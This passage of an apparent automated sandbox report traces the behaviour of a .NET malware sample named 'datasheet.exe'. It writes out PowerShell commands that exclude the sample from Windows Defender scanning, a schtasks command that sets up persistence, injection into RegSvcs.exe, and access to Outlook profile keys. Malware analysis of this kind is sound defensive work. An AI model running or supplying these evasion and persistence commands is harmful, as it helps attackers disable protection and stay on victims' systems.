                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\datasheet.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\datasheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\datasheet.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: datasheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: datasheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: datasheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Ffsv.pdb source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
                    Source: Binary string: Ffsv.pdbSHA256 source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: datasheet.exe, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: EhzaIxEFbjyd.exe.0.dr, MainForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs.Net Code: BIP5McjdoT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.datasheet.exe.7c20000.5.raw.unpack, FNHBTlJ5ZnEVw5Eygp.cs.Net Code: BIP5McjdoT System.Reflection.Assembly.Load(byte[])
                    Source: datasheet.exeStatic PE information: 0xBAD5FF54 [Tue Apr 30 22:31:48 2069 UTC]
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_02B3E768 push esp; retf 0_2_02B3E769
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 0_2_0724F8E5 push edi; iretd 0_2_0724F8E6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015FA6C8 push F40314CCh; retf 9_2_015FA855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F0C45 push ebx; retf 9_2_015F0C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0120A6C8 push F4051BCCh; retf 15_2_0120A855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01200C45 push ebx; retf 15_2_01200C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01200C53 push ebx; retf 15_2_01200C52
                    Source: datasheet.exeStatic PE information: section name: .text entropy: 7.981872933279261
                    Source: EhzaIxEFbjyd.exe.0.drStatic PE information: section name: .text entropy: 7.981872933279261
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, NylW7JUHhxb7j0BeHn.csHigh entropy of concatenated method names: 'jW1GTkRi5s', 'm37Gm5A6K7', 'E1LGMqn9fD', 'T7uG0THAcA', 'DWFG4Lx9bW', 'YcOGXtgK0X', 'E8OGkMnpSJ', 'URJGeFoqOp', 'NFVws7UwHHCDsTuLePZ', 'YJUiyeUyxhSkQVji6RR'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, Mi7lsy2FiRFrPwBMYi.csHigh entropy of concatenated method names: 's8AMIOlp7', 'k4i0kRmc8', 'utn4OFDo7', 'ctnXF7Uww', 'q9Ik37CJx', 'uLqeoMOXM', 'ov6FTTXodlihE8KlRO', 'bSKJVnZuTClaqxU1Lw', 'xGJpxQOfa', 'CcjwenRgD'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, vvxv4PEt7dXC6fXLp6.csHigh entropy of concatenated method names: 'jmhsR7B0Nq', 'Qjwsgsy55Z', 'U2qsyTmpWk', 'JawsUZqvRI', 'Q7RsQX2Q7e', 'G0KsjMsdQP', 'Pn0sHK8dsH', 'oynsaPJ0mD', 'mFxsZlZ5qg', 'sMLsAqNuc4'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, lv8H2d9G3Iqa4sEWPO.csHigh entropy of concatenated method names: 'NOGONB41Hw', 'crEOcwVKAZ', 'S4aOBNArYd', 'fs4OnD31Vr', 'uCfOSYSxoy', 'PMjO8TSh9o', 'BaiOKO2LZK', 'HUrOr6SRsh', 'D0ROE6V00Y', 'oeGO6UIvQn'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, FNHBTlJ5ZnEVw5Eygp.csHigh entropy of concatenated method names: 'ABZxbCf3WS', 'mPPxDJXcix', 'wx9xOn6FiO', 'TMJxohIScT', 'wAYxLpO1iY', 'g9DxGIYlep', 'fcgxlPniZk', 'p09xJfI4n0', 'J34xq3ln20', 'pb9xYMd5tJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, CPPmkRNFv5r53JLsmx.csHigh entropy of concatenated method names: 'asdCAeoAlX', 'fQ4CfVkDTF', 'HdoCNbo2Lm', 'aEDCc6WpUU', 'nE7Cguh8c5', 'QyMCyJGcBW', 'seVCURMk4s', 'y9MCQJuISG', 'HflCjfb7y2', 'MpGCHjOQCI'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, mSgYsTOti3cTYE17og.csHigh entropy of concatenated method names: 'Dispose', 'hgoIETqIgA', 'qQF2gkmhpX', 'LZ2FjVi7Ts', 'RtXI6EPNOi', 'P4IIzUwxGu', 'ProcessDialogKey', 'mnh2Pvxv4P', 't7d2IXC6fX', 'ip622OIErq'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, A9OsSD8vxAmBW3h63P.csHigh entropy of concatenated method names: 'KC5vrVPFJT', 'hRav6IPWjQ', 'dU5pPGwG2P', 'jPxpIKwIBv', 'x1uvFkx0Xf', 'KUmvfeMTdV', 'AXMv7p1vHj', 'cC2vNNkVkj', 'oaqvcqeOxn', 'vCovBQjBgS'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, b14PLreOyPL95jqE2G.csHigh entropy of concatenated method names: 'Ol9LuhSAQr', 'tenLXMKZnq', 'UFZoy9Rep3', 'J3woUst94d', 'kFcoQwCiQB', 'o63ojSZi33', 'hO2oHcn5Gs', 'r6toatOj7W', 'dJioZYYB70', 'kvuoAfyxW6'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, ATDn1PKadogoTqIgAc.csHigh entropy of concatenated method names: 'gHUsCBq44o', 'chNsvf2TdT', 'ghIssoDtQS', 'wojstBRpQ4', 'QI3sihY4aQ', 'pwpsTdiR2k', 'Dispose', 'k1XpD8qTIF', 'fgGpO3HveA', 'hWIpo8BOmN'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, gbqE9akykXACM5vvYv.csHigh entropy of concatenated method names: 'gkUo0VB7lo', 'AvIo4fb5VF', 't8ao9c8YHZ', 'pYjokhLLUZ', 'UjaoC2ggPn', 'JImo3DImZs', 'NI2ovh1Asu', 'SnCoplvhLa', 'AMsosxaMD7', 'krUowDr4fB'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, L4vAxKIIcAZoshGV9H7.csHigh entropy of concatenated method names: 'olww6doItx', 'IYewzR6syG', 'm4ktPnLi9S', 'mvCtIfaG4Q', 'dDlt2cNmxm', 'eIAtxrnEnC', 'JlKt5SDtxB', 'toptbPTuRS', 'zo0tDTTEwe', 'YGNtO0spAF'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, JLCJHyH6c0QTNYmk86.csHigh entropy of concatenated method names: 'jiOlDKKAgl', 'YwWlosEpSq', 'heBlGYUaPi', 'aiRG6SZHOa', 'p22GzyJCx7', 'h0hlPVjahu', 'yOwlIGLSSi', 'i44l2Xn9Df', 'og6lxhcNNo', 'cr0l50M4oG'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, pTw8yI7DDdtg6G8j6r.csHigh entropy of concatenated method names: 'DcIV9VeE8Y', 'JYtVka90eB', 'X3RVR3jAEc', 'LLBVg3C5Ua', 'b1ZVU1hZ35', 'uTMVQiJORf', 'nEnVHcKfOc', 'yo4Va3y0Y0', 'ln3VA0J0BP', 'H9mVFjwMHJ'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, wwpUJiBXK20C4PEluy.csHigh entropy of concatenated method names: 'ToString', 'H5y3F3J0xw', 'dm83gLbwJS', 'u6w3ylEn5D', 'IlU3Ulh6dL', 'M053QGPUo6', 'n4U3jsRRdu', 'fY53HGyZKQ', 'xMS3aqY5Z5', 'KUd3Zb3UGC'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, t0Ige75P2lbOS8wTrY.csHigh entropy of concatenated method names: 'bQYIlv8H2d', 'i3IIJqa4sE', 'LykIYXACM5', 'qvYIdv214P', 'KqEIC2GEvo', 'rWRI3RpNlT', 'wEaOyK2f8VqpLU5H30', 'icTEnfgwPcVEUjKfhK', 'TQ1IIeC9qk', 'DYmIxgK5Gl'
                    Source: 0.2.datasheet.exe.3fa1670.1.raw.unpack, YvopWRRRpNlTsh2H4Y.csHigh entropy of concatenated method names: 'm8ZGb1BEE7', 'VWhGOhix1R', 'XOyGLf0FTA', 'mXlGlUnvSF', 'DgPGJ3YhAY', 'wG8LSPDbJm', 'RcmL87LndG', 'uBeLKWhHMX', 'L3SLrQkmnG', 'KiLLEdlMbW'
